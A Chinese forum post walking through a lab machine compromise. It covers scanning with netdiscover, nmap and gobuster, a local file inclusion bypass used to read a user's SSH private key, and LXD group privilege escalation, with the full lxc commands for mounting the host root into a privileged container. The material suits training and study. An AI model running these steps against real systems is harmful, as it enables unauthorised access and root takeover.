CyNix

打印 上一主题 下一主题

主题 861|帖子 861|积分 2583

主机发现
  1. 1 netdiscover -i eth0 -r 192.168.15.0/24
复制代码

端口扫描
  1. 1 nmap -A -p- -sV 192.168.15.157
复制代码

访问80端口

目录扫描
  1. 1 gobuster dir -u http://192.168.15.157 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
复制代码

访问/lavalamp子目录

在CONCAT提交会出现一个空缺框

使用burp进行流量截取

复制URL打开发现有内容被隐藏,修改数值为1.0即可表现

继承开启监听,发现参数是file,大概存在LIF漏洞

被过滤了不允许访问

加上a成功绕过

发现可登录用户ford

采用另一个端口(6688)进行ssh连接
  1. 1 ssh ford@192.168.15.157 -p 6688
复制代码

表现关闭了暗码登录,所以需要一个私钥进行登录
补充说明:私钥一般和公钥放在一起,理论上都在用户的家目录中

复制私钥并赋予公道的权限再次进行连接

获取到第一个flag

使用LinEnum工具进行提权
链接:https://github.com/rebootuser/LinEnum
把当前目录利用python进行发布

在靶机上下载脚本,赋予实验权限后实验脚本

再次补充:
LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
总结来说,LXD是基于LXC的系统级容器管理器,提供了更高级别的接口和管理工具;LXC是Linux内核提供的一种假造化技术,允许在单个Linux内核上运行多个隔离的用户空间实例;而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。
LXD提权原理:LXD 是基于 LXC 容器的管理程序,当前用户可操作容器。所以用户可创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。
LXD 提权条件: 已经获得 shell  用户属于 lxd 组 
查看镜像列表
  1. 1 lxc image list
复制代码

按照实际环境,需要创建一个特权镜像,但每每会失败,所以这里选择在kali天生镜像,然后复制到靶机上面
先在kali上面下载alpine,然后天生镜像
链接:https://github.com/saghul/lxd-alpine-builder

发布当前目录,在靶机上进行复制

导入镜像并对其重定名
  1. 1 lxc image import alpine-v3.20-x86_64-20240531_2302.tar.gz --alias hacker
复制代码

创建容器
  1. 1 lxc init hacker hacker -c security.privileged=true
复制代码

将容器hacker挂载到 /mnt/root 下
  1. 1 lxc config device add hacker hacker disk source=/ path=/mnt/root recursive=true
复制代码

启动容器
  1. 1 lxc start hacker
复制代码
与主机进行交互
  1. 1 lxc exec hacker /bin/sh
复制代码

获取到第二个flag


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

瑞星

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表